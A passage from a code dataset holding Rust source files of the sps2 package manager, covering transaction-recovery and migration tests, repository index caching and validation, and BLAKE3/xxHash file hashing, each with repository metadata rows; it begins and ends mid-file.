"Journal file should be cleared after recovery"
);
// The live directory should have been swapped.
// We can't easily check the content here without more setup, but we can check the slot state.
let active_slot = new_state_manager.active_slot().await;
assert_eq!(active_slot, journal.staging_slot);
let new_slot_state = new_state_manager.slot_state(active_slot).await;
assert_eq!(new_slot_state, Some(staging_id));
}
#[tokio::test]
async fn test_recovers_from_swapped_state() {
let (_td, state) = mk_state().await;
let parent_id = state.get_current_state_id().await.unwrap();
// 1. Prepare a transaction.
let staging_id = Uuid::new_v4();
let td = TransactionData {
package_refs: &[],
file_references: &[],
pending_file_hashes: &[],
};
let staging_slot = state.inactive_slot().await;
let mut journal = state
.prepare_transaction(&staging_id, &parent_id, staging_slot, "test", &td)
.await
.unwrap();
// 2. Manually perform the swap and update the journal to the `Swapped` phase.
{
let mut slots = state.live_slots.lock().await; // Assuming live_slots is public for test
slots
.swap_to_live(
journal.staging_slot,
journal.new_state_id,
journal.parent_state_id,
)
.await
.unwrap();
}
journal.phase = sps2_types::state::TransactionPhase::Swapped;
state.write_journal(&journal).await.unwrap();
// At this point, a crash happens. The filesystem is updated, but the DB is not.
let db_active_id = state.get_current_state_id().await.unwrap();
assert_eq!(
db_active_id, parent_id,
"DB active state should not be updated yet"
);
// 3. Simulate an application restart.
let state_base_path = _td.path().to_path_buf();
let new_state_manager = StateManager::new(&state_base_path).await.unwrap();
// 4. Verify the outcome.
// The new state should be active in the DB.
let active_id = new_state_manager.get_current_state_id().await.unwrap();
assert_eq!(active_id, staging_id);
// The journal file should be gone.
let journal_path = state_base_path.join("transaction.json");
assert!(
tokio::fs::metadata(&journal_path).await.is_err(),
"Journal file should be cleared after recovery"
);
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/tests/migration_smoke.rs | crates/state/tests/migration_smoke.rs | use tempfile::TempDir;
#[tokio::test]
async fn migrations_apply_and_expose_core_tables() {
let temp_dir = TempDir::new().expect("temp dir");
let db_path = temp_dir.path().join("state.sqlite");
let pool = sps2_state::create_pool(&db_path)
.await
.expect("create pool");
sps2_state::run_migrations(&pool)
.await
.expect("run migrations");
let mut conn = pool.acquire().await.expect("acquire connection");
for table in [
"states",
"state_packages",
"package_versions",
"cas_objects",
"package_files",
"file_verification",
] {
let exists: Option<i64> =
sqlx::query_scalar("SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?1")
.bind(table)
.fetch_optional(&mut *conn)
.await
.expect("check table existence");
assert!(exists.is_some(), "expected table `{table}` to exist");
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/index/src/lib.rs | crates/index/src/lib.rs | #![warn(mismatched_lifetime_syntaxes)]
#![deny(clippy::pedantic, unsafe_code)]
#![allow(clippy::module_name_repetitions)]
//! Package repository index for sps2
//!
//! This crate handles the repository index that lists all available
//! packages and their versions. The index is cached locally for
//! offline use and validated for freshness.
mod cache;
mod models;
pub use cache::IndexCache;
pub use models::{
DependencyInfo, Index, IndexMetadata, PackageEntry, SbomEntry, SbomInfo, VersionEntry,
};
use chrono::Utc;
use sps2_errors::Error;
use sps2_types::{package::PackageSpec, Version};
// HashMap removed - not used
use std::path::Path;
/// Supported index format version
pub const SUPPORTED_INDEX_VERSION: u32 = 1;
/// Repository index manager
#[derive(Clone, Debug)]
pub struct IndexManager {
index: Option<Index>,
pub cache: IndexCache,
}
impl IndexManager {
/// Create a new index manager with cache directory
pub fn new(cache_dir: impl AsRef<Path>) -> Self {
Self {
index: None,
cache: IndexCache::new(cache_dir),
}
}
/// Load index from cache or JSON content
///
/// # Errors
///
/// Returns an error if the JSON content is invalid, cache cannot be read,
/// or the index fails validation.
pub async fn load(&mut self, content: Option<&str>) -> Result<(), Error> {
let index = if let Some(json) = content {
// Parse provided content
Index::from_json(json)?
} else {
// Try to load from cache
self.cache.load().await?
};
// Validate index
index.validate()?;
self.index = Some(index);
Ok(())
}
/// Save current index to cache
///
/// # Errors
///
/// Returns an error if the cache cannot be written to disk.
pub async fn save_to_cache(&self) -> Result<(), Error> {
if let Some(index) = &self.index {
self.cache.save(index).await?;
}
Ok(())
}
/// Get the loaded index
#[must_use]
pub fn index(&self) -> Option<&Index> {
self.index.as_ref()
}
/// Search for packages by name (prefix match)
pub fn search(&self, query: &str) -> Vec<&str> {
let Some(index) = &self.index else {
return Vec::new();
};
let query_lower = query.to_lowercase();
let mut results: Vec<&str> = index
.packages
.keys()
.filter(|name| name.to_lowercase().starts_with(&query_lower))
.map(String::as_str)
.collect();
results.sort_unstable();
results
}
/// Get all versions of a package
#[must_use]
pub fn get_package_versions(&self, name: &str) -> Option<Vec<&VersionEntry>> {
let index = self.index.as_ref()?;
let package = index.packages.get(name)?;
let mut versions: Vec<(&String, &VersionEntry)> = package.versions.iter().collect();
versions.sort_by(|a, b| {
// Sort by version descending (newest first)
Version::parse(b.0)
.unwrap_or_else(|_| Version::new(0, 0, 0))
.cmp(&Version::parse(a.0).unwrap_or_else(|_| Version::new(0, 0, 0)))
});
Some(versions.into_iter().map(|(_, entry)| entry).collect())
}
/// Get all versions of a package, including their version strings
/// sorted by version descending (newest first)
#[must_use]
pub fn get_package_versions_with_strings(
&self,
name: &str,
) -> Option<Vec<(&str, &VersionEntry)>> {
let index = self.index.as_ref()?;
let package = index.packages.get(name)?;
let mut versions: Vec<(&String, &VersionEntry)> = package.versions.iter().collect();
versions.sort_by(|a, b| {
// Sort by version descending (newest first)
Version::parse(b.0)
.unwrap_or_else(|_| Version::new(0, 0, 0))
.cmp(&Version::parse(a.0).unwrap_or_else(|_| Version::new(0, 0, 0)))
});
Some(
versions
.into_iter()
.map(|(v, entry)| (v.as_str(), entry))
.collect(),
)
}
/// Find the best version matching a spec
#[must_use]
pub fn find_best_version(&self, spec: &PackageSpec) -> Option<&VersionEntry> {
self.find_best_version_with_string(spec)
.map(|(_, entry)| entry)
}
/// Find the best version matching a spec, returning both version string and entry
#[must_use]
pub fn find_best_version_with_string(
&self,
spec: &PackageSpec,
) -> Option<(&str, &VersionEntry)> {
let index = self.index.as_ref()?;
let package = index.packages.get(&spec.name)?;
// Collect versions with their version strings, sort by version descending
let mut versions: Vec<(&String, &VersionEntry)> = package.versions.iter().collect();
versions.sort_by(|a, b| {
// Sort by version descending (newest first)
Version::parse(b.0)
.unwrap_or_else(|_| Version::new(0, 0, 0))
.cmp(&Version::parse(a.0).unwrap_or_else(|_| Version::new(0, 0, 0)))
});
// Find highest version that satisfies the spec
versions.into_iter().find_map(|(version_str, entry)| {
if let Ok(version) = Version::parse(version_str) {
if spec.version_spec.matches(&version) {
Some((version_str.as_str(), entry))
} else {
None
}
} else {
None
}
})
}
/// Get a specific version entry
#[must_use]
pub fn get_version(&self, name: &str, version: &str) -> Option<&VersionEntry> {
self.index
.as_ref()?
.packages
.get(name)?
.versions
.get(version)
}
/// Check if index is stale (older than `max_age_days`)
#[must_use]
pub fn is_stale(&self, max_age_days: u32) -> bool {
let Some(index) = &self.index else {
return true;
};
let max_age = chrono::Duration::days(i64::from(max_age_days));
let age = Utc::now() - index.metadata.timestamp;
age > max_age
}
/// Get index metadata
#[must_use]
pub fn metadata(&self) -> Option<&IndexMetadata> {
self.index.as_ref().map(|i| &i.metadata)
}
/// Set index directly (primarily for testing)
///
/// This method bypasses validation and should only be used in tests.
#[doc(hidden)]
pub fn set_index(&mut self, index: Index) {
self.index = Some(index);
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/index/src/cache.rs | crates/index/src/cache.rs | //! Index caching functionality
use crate::models::Index;
use sps2_errors::{Error, StorageError};
use std::path::{Path, PathBuf};
use tokio::fs;
/// Index cache manager
#[derive(Clone, Debug)]
pub struct IndexCache {
cache_dir: PathBuf,
}
impl IndexCache {
/// Create a new cache manager
pub fn new(cache_dir: impl AsRef<Path>) -> Self {
Self {
cache_dir: cache_dir.as_ref().to_path_buf(),
}
}
/// Get the index cache file path
fn index_path(&self) -> PathBuf {
self.cache_dir.join("index.json")
}
/// Get the index metadata file path (for `ETag`, etc.)
fn metadata_path(&self) -> PathBuf {
self.cache_dir.join("index.meta")
}
/// Load index from cache
///
/// # Errors
///
/// Returns an error if the cache file doesn't exist or contains invalid data.
pub async fn load(&self) -> Result<Index, Error> {
let path = self.index_path();
let content = fs::read_to_string(&path)
.await
.map_err(|_e| StorageError::PathNotFound {
path: path.display().to_string(),
})?;
Index::from_json(&content)
}
/// Save index to cache
///
/// # Errors
///
/// Returns an error if the cache directory cannot be created or the file cannot be written.
pub async fn save(&self, index: &Index) -> Result<(), Error> {
// Ensure cache directory exists
fs::create_dir_all(&self.cache_dir)
.await
.map_err(|e| StorageError::IoError {
message: format!("failed to create cache dir: {e}"),
})?;
let path = self.index_path();
let json = index.to_json()?;
// Write to temporary file first
let temp_path = path.with_extension("tmp");
fs::write(&temp_path, &json)
.await
.map_err(|e| StorageError::IoError {
message: format!("failed to write cache: {e}"),
})?;
// Atomic rename
fs::rename(&temp_path, &path)
.await
.map_err(|e| StorageError::IoError {
message: format!("failed to rename cache file: {e}"),
})?;
Ok(())
}
/// Check if cache exists
pub async fn exists(&self) -> bool {
fs::metadata(self.index_path()).await.is_ok()
}
/// Get cache age in seconds
///
/// # Errors
///
/// Returns an error if file metadata cannot be read or timestamps are invalid.
pub async fn age(&self) -> Result<Option<u64>, Error> {
let path = self.index_path();
match fs::metadata(&path).await {
Ok(metadata) => {
let modified = metadata.modified().map_err(|e| StorageError::IoError {
message: format!("failed to get modification time: {e}"),
})?;
let age = std::time::SystemTime::now()
.duration_since(modified)
.map(|d| d.as_secs())
.unwrap_or(0);
Ok(Some(age))
}
Err(_) => Ok(None),
}
}
/// Clear the cache
///
/// # Errors
///
/// This function does not return errors as file removal failures are ignored.
pub async fn clear(&self) -> Result<(), Error> {
let _ = fs::remove_file(self.index_path()).await;
let _ = fs::remove_file(self.metadata_path()).await;
Ok(())
}
/// Load cached `ETag`
///
/// # Errors
///
/// Does not return errors - missing files return `None`.
pub async fn load_etag(&self) -> Result<Option<String>, Error> {
let path = self.metadata_path();
match fs::read_to_string(&path).await {
Ok(content) => {
// Simple format: first line is ETag
Ok(content.lines().next().map(String::from))
}
Err(_) => Ok(None),
}
}
/// Save `ETag`
///
/// # Errors
///
/// Returns an error if the metadata file cannot be written.
pub async fn save_etag(&self, etag: &str) -> Result<(), Error> {
let path = self.metadata_path();
fs::write(&path, etag)
.await
.map_err(|e| StorageError::IoError {
message: format!("failed to save ETag: {e}"),
})?;
Ok(())
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/index/src/models.rs | crates/index/src/models.rs | //! Index data models
use chrono::{DateTime, Utc};
use serde::{Deserialize, Serialize};
use sps2_errors::{Error, PackageError};
use sps2_types::Arch;
use std::collections::HashMap;
/// Repository index
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Index {
#[serde(flatten)]
pub metadata: IndexMetadata,
pub packages: HashMap<String, PackageEntry>,
}
/// Index metadata
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct IndexMetadata {
pub version: u32,
pub minimum_client: String,
pub timestamp: DateTime<Utc>,
}
/// Package entry in index
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
pub struct PackageEntry {
pub versions: HashMap<String, VersionEntry>,
}
/// Version entry in index
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct VersionEntry {
pub revision: u32,
pub arch: String,
pub blake3: String,
pub download_url: String,
pub minisig_url: String,
pub dependencies: DependencyInfo,
#[serde(skip_serializing_if = "Option::is_none")]
pub sbom: Option<SbomInfo>,
#[serde(skip_serializing_if = "Option::is_none")]
pub description: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub homepage: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub license: Option<String>,
}
/// Dependency information
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
pub struct DependencyInfo {
#[serde(default)]
pub runtime: Vec<String>,
#[serde(default)]
pub build: Vec<String>,
}
/// SBOM information
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct SbomInfo {
pub spdx: SbomEntry,
#[serde(skip_serializing_if = "Option::is_none")]
pub cyclonedx: Option<SbomEntry>,
}
/// SBOM entry
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct SbomEntry {
pub url: String,
pub blake3: String,
}
impl Default for Index {
fn default() -> Self {
Self::new()
}
}
impl Index {
/// Create a new empty index
#[must_use]
pub fn new() -> Self {
Self {
metadata: IndexMetadata {
version: crate::SUPPORTED_INDEX_VERSION,
minimum_client: "0.1.0".to_string(),
timestamp: Utc::now(),
},
packages: HashMap::new(),
}
}
/// Parse index from JSON
///
/// # Errors
///
/// Returns an error if the JSON is malformed or cannot be parsed.
pub fn from_json(json: &str) -> Result<Self, Error> {
serde_json::from_str(json).map_err(|e| {
PackageError::InvalidFormat {
message: format!("invalid index JSON: {e}"),
}
.into()
})
}
/// Serialize index to JSON
///
/// # Errors
///
/// Returns an error if the index cannot be serialized to JSON.
pub fn to_json(&self) -> Result<String, Error> {
serde_json::to_string_pretty(self).map_err(|e| {
PackageError::InvalidFormat {
message: format!("failed to serialize index: {e}"),
}
.into()
})
}
/// Validate index format and version
///
/// # Errors
///
/// Returns an error if the index version is unsupported, package names are empty,
/// versions are missing, architectures are unsupported, or required fields are missing.
pub fn validate(&self) -> Result<(), Error> {
// Check version compatibility
if self.metadata.version > crate::SUPPORTED_INDEX_VERSION {
return Err(PackageError::InvalidFormat {
message: format!(
"index version {} is newer than supported version {}",
self.metadata.version,
crate::SUPPORTED_INDEX_VERSION
),
}
.into());
}
// Validate entries
for (name, package) in &self.packages {
if name.is_empty() {
return Err(PackageError::InvalidFormat {
message: "empty package name in index".to_string(),
}
.into());
}
for (version, entry) in &package.versions {
if version.is_empty() {
return Err(PackageError::InvalidFormat {
message: format!("empty version for package {name}"),
}
.into());
}
// Validate architecture
if entry.arch != "arm64" {
return Err(PackageError::InvalidFormat {
message: format!("unsupported architecture: {}", entry.arch),
}
.into());
}
// Validate URLs
if entry.download_url.is_empty() {
return Err(PackageError::InvalidFormat {
message: format!("missing download URL for {name}-{version}"),
}
.into());
}
if entry.blake3.is_empty() {
return Err(PackageError::InvalidFormat {
message: format!("missing BLAKE3 hash for {name}-{version}"),
}
.into());
}
}
}
Ok(())
}
/// Add or update a package version
pub fn add_version(&mut self, name: String, version: String, entry: VersionEntry) {
self.packages
.entry(name)
.or_default()
.versions
.insert(version, entry);
}
/// Remove a package version
pub fn remove_version(&mut self, name: &str, version: &str) -> Option<VersionEntry> {
self.packages.get_mut(name)?.versions.remove(version)
}
/// Get total package count
#[must_use]
pub fn package_count(&self) -> usize {
self.packages.len()
}
/// Get total version count
#[must_use]
pub fn version_count(&self) -> usize {
self.packages.values().map(|p| p.versions.len()).sum()
}
}
impl VersionEntry {
/// Get the version string from the parent context
/// (In actual use, version is the `HashMap` key)
#[must_use]
pub fn version(&self) -> String {
// This is a placeholder - in practice, the version
// is known from the HashMap key when accessing this entry
String::new()
}
/// Get architecture as enum
///
/// # Errors
///
/// Returns an error if the architecture string is not supported.
pub fn arch(&self) -> Result<Arch, Error> {
match self.arch.as_str() {
"arm64" => Ok(Arch::Arm64),
_ => Err(PackageError::InvalidFormat {
message: format!("unsupported architecture: {}", self.arch),
}
.into()),
}
}
/// Check if this version has SBOM data
#[must_use]
pub fn has_sbom(&self) -> bool {
self.sbom.is_some()
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/hash/src/lib.rs | crates/hash/src/lib.rs | #![warn(mismatched_lifetime_syntaxes)]
#![deny(clippy::pedantic, unsafe_code)]
#![allow(clippy::module_name_repetitions)]
//! Dual hashing for sps2: BLAKE3 for downloads, xxHash for local verification
//!
//! This crate provides hashing functionality for content-addressed storage
//! and integrity verification using different algorithms for different purposes.
mod file_hasher;
pub use file_hasher::{calculate_file_storage_path, FileHashResult, FileHasher, FileHasherConfig};
use blake3::Hasher as Blake3Hasher;
use serde::{Deserialize, Serialize};
use sps2_errors::{Error, StorageError};
use std::collections::BTreeMap;
use std::fmt;
use std::path::Path;
use tokio::fs::File;
use tokio::io::{AsyncReadExt, AsyncWriteExt};
use xxhash_rust::xxh3::Xxh3;
/// Size of chunks for streaming hash computation
const CHUNK_SIZE: usize = 64 * 1024; // 64KB
/// Hash algorithm type
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub enum HashAlgorithm {
/// BLAKE3 - used for download verification
Blake3,
/// xxHash 128-bit - used for local verification
XxHash128,
}
impl Default for HashAlgorithm {
fn default() -> Self {
Self::XxHash128 // Default to xxHash for local operations
}
}
/// A hash value that can use different algorithms
#[derive(Debug, Clone, PartialEq, Eq, Hash)]
pub struct Hash {
algorithm: HashAlgorithm,
bytes: Vec<u8>, // Variable length to support different hash sizes
}
impl Hash {
/// Create a BLAKE3 hash from raw bytes (32 bytes)
#[must_use]
pub fn from_blake3_bytes(bytes: [u8; 32]) -> Self {
Self {
algorithm: HashAlgorithm::Blake3,
bytes: bytes.to_vec(),
}
}
/// Create an xxHash 128-bit hash from raw bytes (16 bytes)
#[must_use]
pub fn from_xxhash128_bytes(bytes: [u8; 16]) -> Self {
Self {
algorithm: HashAlgorithm::XxHash128,
bytes: bytes.to_vec(),
}
}
/// Get the hash algorithm
#[must_use]
pub fn algorithm(&self) -> HashAlgorithm {
self.algorithm
}
/// Get the raw bytes
#[must_use]
pub fn as_bytes(&self) -> &[u8] {
&self.bytes
}
/// Convert to hex string
#[must_use]
pub fn to_hex(&self) -> String {
hex::encode(&self.bytes)
}
/// Parse from hex string (detects algorithm based on length)
///
/// # Errors
/// Returns an error if the input string is not valid hexadecimal.
pub fn from_hex(s: &str) -> Result<Self, Error> {
let bytes = hex::decode(s).map_err(|e| StorageError::CorruptedData {
message: format!("invalid hex: {e}"),
})?;
// Determine algorithm based on length
match bytes.len() {
32 => {
let mut array = [0u8; 32];
array.copy_from_slice(&bytes);
Ok(Self::from_blake3_bytes(array))
}
16 => {
let mut array = [0u8; 16];
array.copy_from_slice(&bytes);
Ok(Self::from_xxhash128_bytes(array))
}
_ => Err(StorageError::CorruptedData {
message: format!("hash must be 16 or 32 bytes, got {}", bytes.len()),
}
.into()),
}
}
/// Compute hash of a byte slice using default algorithm (xxHash128)
#[must_use]
pub fn from_data(data: &[u8]) -> Self {
Self::from_data_with_algorithm(data, HashAlgorithm::default())
}
/// Compute hash of a byte slice using specified algorithm
#[must_use]
pub fn from_data_with_algorithm(data: &[u8], algorithm: HashAlgorithm) -> Self {
match algorithm {
HashAlgorithm::Blake3 => {
let hash = blake3::hash(data);
Self::from_blake3_bytes(*hash.as_bytes())
}
HashAlgorithm::XxHash128 => {
let hash = xxhash_rust::xxh3::xxh3_128(data);
Self::from_xxhash128_bytes(hash.to_le_bytes())
}
}
}
/// Compute BLAKE3 hash of a byte slice (for download verification)
#[must_use]
pub fn blake3_from_data(data: &[u8]) -> Self {
Self::from_data_with_algorithm(data, HashAlgorithm::Blake3)
}
/// Compute xxHash128 hash of a byte slice (for local verification)
#[must_use]
pub fn xxhash128_from_data(data: &[u8]) -> Self {
Self::from_data_with_algorithm(data, HashAlgorithm::XxHash128)
}
/// Check if this is a BLAKE3 hash
#[must_use]
pub fn is_blake3(&self) -> bool {
matches!(self.algorithm, HashAlgorithm::Blake3)
}
/// Check if this is an xxHash128 hash
#[must_use]
pub fn is_xxhash128(&self) -> bool {
matches!(self.algorithm, HashAlgorithm::XxHash128)
}
/// Get the expected byte length for this hash algorithm
#[must_use]
pub fn expected_length(&self) -> usize {
match self.algorithm {
HashAlgorithm::Blake3 => 32,
HashAlgorithm::XxHash128 => 16,
}
}
/// Compute hash of a file using default algorithm (xxHash128)
///
/// # Errors
/// Returns an error if the file cannot be opened, read, or if any I/O operation fails.
pub async fn hash_file(path: &Path) -> Result<Self, Error> {
Self::hash_file_with_algorithm(path, HashAlgorithm::default()).await
}
/// Compute hash of a file using specified algorithm
///
/// # Errors
/// Returns an error if the file cannot be opened, read, or if any I/O operation fails.
pub async fn hash_file_with_algorithm(
path: &Path,
algorithm: HashAlgorithm,
) -> Result<Self, Error> {
let mut file = File::open(path)
.await
.map_err(|_| StorageError::PathNotFound {
path: path.display().to_string(),
})?;
match algorithm {
HashAlgorithm::Blake3 => {
let mut hasher = Blake3Hasher::new();
let mut buffer = vec![0; CHUNK_SIZE];
loop {
let n = file.read(&mut buffer).await?;
if n == 0 {
break;
}
hasher.update(&buffer[..n]);
}
Ok(Self::from_blake3_bytes(*hasher.finalize().as_bytes()))
}
HashAlgorithm::XxHash128 => {
let mut hasher = Xxh3::new();
let mut buffer = vec![0; CHUNK_SIZE];
loop {
let n = file.read(&mut buffer).await?;
if n == 0 {
break;
}
hasher.update(&buffer[..n]);
}
let hash_result = hasher.digest128();
Ok(Self::from_xxhash128_bytes(hash_result.to_le_bytes()))
}
}
}
/// Compute BLAKE3 hash of a file (for download verification)
///
/// # Errors
/// Returns an error if the file cannot be opened, read, or if any I/O operation fails.
pub async fn blake3_hash_file(path: &Path) -> Result<Self, Error> {
Self::hash_file_with_algorithm(path, HashAlgorithm::Blake3).await
}
/// Compute hash while copying data to a writer using default algorithm (xxHash128)
///
/// # Errors
/// Returns an error if reading from the reader or writing to the writer fails.
pub async fn hash_and_copy<R, W>(reader: R, writer: W) -> Result<(Self, u64), Error>
where
R: AsyncReadExt + Unpin,
W: AsyncWriteExt + Unpin,
{
Self::hash_and_copy_with_algorithm(reader, writer, HashAlgorithm::default()).await
}
/// Compute hash while copying data to a writer using specified algorithm
///
/// # Errors
/// Returns an error if reading from the reader or writing to the writer fails.
pub async fn hash_and_copy_with_algorithm<R, W>(
mut reader: R,
mut writer: W,
algorithm: HashAlgorithm,
) -> Result<(Self, u64), Error>
where
R: AsyncReadExt + Unpin,
W: AsyncWriteExt + Unpin,
{
let mut buffer = vec![0; CHUNK_SIZE];
let mut total_bytes = 0u64;
match algorithm {
HashAlgorithm::Blake3 => {
let mut hasher = Blake3Hasher::new();
loop {
let n = reader.read(&mut buffer).await?;
if n == 0 {
break;
}
hasher.update(&buffer[..n]);
writer.write_all(&buffer[..n]).await?;
total_bytes += n as u64;
}
writer.flush().await?;
Ok((
Self::from_blake3_bytes(*hasher.finalize().as_bytes()),
total_bytes,
))
}
HashAlgorithm::XxHash128 => {
let mut hasher = Xxh3::new();
loop {
let n = reader.read(&mut buffer).await?;
if n == 0 {
break;
}
hasher.update(&buffer[..n]);
writer.write_all(&buffer[..n]).await?;
total_bytes += n as u64;
}
writer.flush().await?;
let hash_result = hasher.digest128();
Ok((
Self::from_xxhash128_bytes(hash_result.to_le_bytes()),
total_bytes,
))
}
}
}
/// Compute deterministic hash of a directory's contents using default algorithm (xxHash128)
///
/// This creates a reproducible hash by:
/// 1. Sorting all files by relative path
/// 2. Hashing each file's relative path, permissions, and contents
/// 3. Combining all hashes in a deterministic order
///
/// # Errors
/// Returns an error if directory traversal or file operations fail.
pub async fn hash_directory(dir_path: &Path) -> Result<Self, Error> {
Self::hash_directory_with_algorithm(dir_path, HashAlgorithm::default()).await
}
/// Compute deterministic hash of a directory's contents using specified algorithm
///
/// # Errors
/// Returns an error if directory traversal or file operations fail.
pub async fn hash_directory_with_algorithm(
dir_path: &Path,
algorithm: HashAlgorithm,
) -> Result<Self, Error> {
// Collect all files with their metadata
let mut files = BTreeMap::new();
collect_files(dir_path, dir_path, &mut files).await?;
match algorithm {
HashAlgorithm::Blake3 => {
// Create a hasher for the entire directory
let mut dir_hasher = Blake3Hasher::new();
// Process files in sorted order
for (rel_path, (full_path, metadata)) in files {
// Hash the relative path
dir_hasher.update(rel_path.as_bytes());
dir_hasher.update(b"\0"); // null separator
// Hash file type and permissions
#[cfg(unix)]
{
use std::os::unix::fs::PermissionsExt;
let mode = metadata.permissions().mode();
dir_hasher.update(&mode.to_le_bytes());
}
if metadata.is_file() {
// Hash file contents
let file_hash =
Self::hash_file_with_algorithm(&full_path, algorithm).await?;
dir_hasher.update(file_hash.as_bytes());
} else if metadata.is_symlink() {
// Hash symlink target
let target = tokio::fs::read_link(&full_path).await?;
dir_hasher.update(target.to_string_lossy().as_bytes());
}
// Add another separator
dir_hasher.update(b"\0");
}
Ok(Self::from_blake3_bytes(*dir_hasher.finalize().as_bytes()))
}
HashAlgorithm::XxHash128 => {
// Create a hasher for the entire directory
let mut dir_hasher = Xxh3::new();
// Process files in sorted order
for (rel_path, (full_path, metadata)) in files {
// Hash the relative path
dir_hasher.update(rel_path.as_bytes());
dir_hasher.update(b"\0"); // null separator
// Hash file type and permissions
#[cfg(unix)]
{
use std::os::unix::fs::PermissionsExt;
let mode = metadata.permissions().mode();
dir_hasher.update(&mode.to_le_bytes());
}
if metadata.is_file() {
// Hash file contents
let file_hash =
Self::hash_file_with_algorithm(&full_path, algorithm).await?;
dir_hasher.update(file_hash.as_bytes());
} else if metadata.is_symlink() {
// Hash symlink target
let target = tokio::fs::read_link(&full_path).await?;
dir_hasher.update(target.to_string_lossy().as_bytes());
}
// Add another separator
dir_hasher.update(b"\0");
}
let hash_result = dir_hasher.digest128();
Ok(Self::from_xxhash128_bytes(hash_result.to_le_bytes()))
}
}
}
}
impl fmt::Display for Hash {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "{}", self.to_hex())
}
}
impl Serialize for Hash {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: serde::Serializer,
{
serializer.serialize_str(&self.to_hex())
}
}
impl<'de> Deserialize<'de> for Hash {
fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
where
D: serde::Deserializer<'de>,
{
let s = String::deserialize(deserializer)?;
Self::from_hex(&s).map_err(serde::de::Error::custom)
}
}
/// Verify a file matches an expected hash
///
/// # Errors
/// Returns an error if the file cannot be read or hashed.
pub async fn verify_file(path: &Path, expected: &Hash) -> Result<bool, Error> {
let actual = Hash::hash_file(path).await?;
Ok(actual == *expected)
}
/// Create a content-addressed path from a hash
#[must_use]
pub fn content_path(hash: &Hash) -> String {
hash.to_hex()
}
/// Helper function to collect all files in a directory recursively
async fn collect_files(
base_path: &Path,
current_path: &Path,
files: &mut BTreeMap<String, (std::path::PathBuf, std::fs::Metadata)>,
) -> Result<(), Error> {
let mut entries = tokio::fs::read_dir(current_path).await?;
while let Some(entry) = entries.next_entry().await? {
let path = entry.path();
let metadata = entry.metadata().await?;
// Get relative path from base
let rel_path = path
.strip_prefix(base_path)
.map_err(|_| StorageError::IoError {
message: "failed to compute relative path".to_string(),
})?
.to_string_lossy()
.to_string();
files.insert(rel_path.clone(), (path.clone(), metadata.clone()));
// Recurse into directories
if metadata.is_dir() {
Box::pin(collect_files(base_path, &path, files)).await?;
}
}
Ok(())
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/hash/src/file_hasher.rs | crates/hash/src/file_hasher.rs | //! File-level hashing operations for content-addressed storage
//!
//! This module provides functionality for hashing individual files
//! during package extraction and installation, supporting parallel
//! processing and metadata collection.
use crate::Hash;
use sps2_errors::{Error, StorageError};
use std::path::{Path, PathBuf};
use tokio::sync::mpsc;
use tokio::task::JoinSet;
/// Result of hashing a single file
#[derive(Debug, Clone, serde::Serialize, serde::Deserialize)]
pub struct FileHashResult {
/// Relative path within the package
pub relative_path: String,
/// Hash of the file contents (algorithm depends on context)
pub hash: Hash,
/// File size in bytes
pub size: u64,
/// Whether this is a directory
pub is_directory: bool,
/// Whether this is a symlink
pub is_symlink: bool,
/// Unix permissions (if available)
#[cfg(unix)]
pub mode: Option<u32>,
}
/// Configuration for file hashing operations
#[derive(Debug, Clone)]
pub struct FileHasherConfig {
/// Maximum number of concurrent hash operations
pub max_concurrency: usize,
/// Whether to follow symlinks
pub follow_symlinks: bool,
/// Whether to include directory entries
pub include_directories: bool,
}
impl Default for FileHasherConfig {
fn default() -> Self {
Self {
max_concurrency: 4,
follow_symlinks: false,
include_directories: true,
}
}
}
/// File hasher for processing multiple files
#[derive(Debug)]
pub struct FileHasher {
config: FileHasherConfig,
}
impl FileHasher {
/// Create a new file hasher with the given configuration
#[must_use]
pub fn new(config: FileHasherConfig) -> Self {
Self { config }
}
/// Hash a single file and collect metadata
///
/// # Errors
/// Returns an error if the file cannot be read or metadata cannot be accessed
pub async fn hash_file_with_metadata(
&self,
path: &Path,
base_path: &Path,
) -> Result<FileHashResult, Error> {
let metadata = tokio::fs::symlink_metadata(path).await?;
// Calculate relative path
let relative_path = path
.strip_prefix(base_path)
.map_err(|_| StorageError::IoError {
message: format!("failed to compute relative path for {}", path.display()),
})?
.to_string_lossy()
.to_string();
// Handle different file types
if metadata.is_dir() {
Ok(FileHashResult {
relative_path,
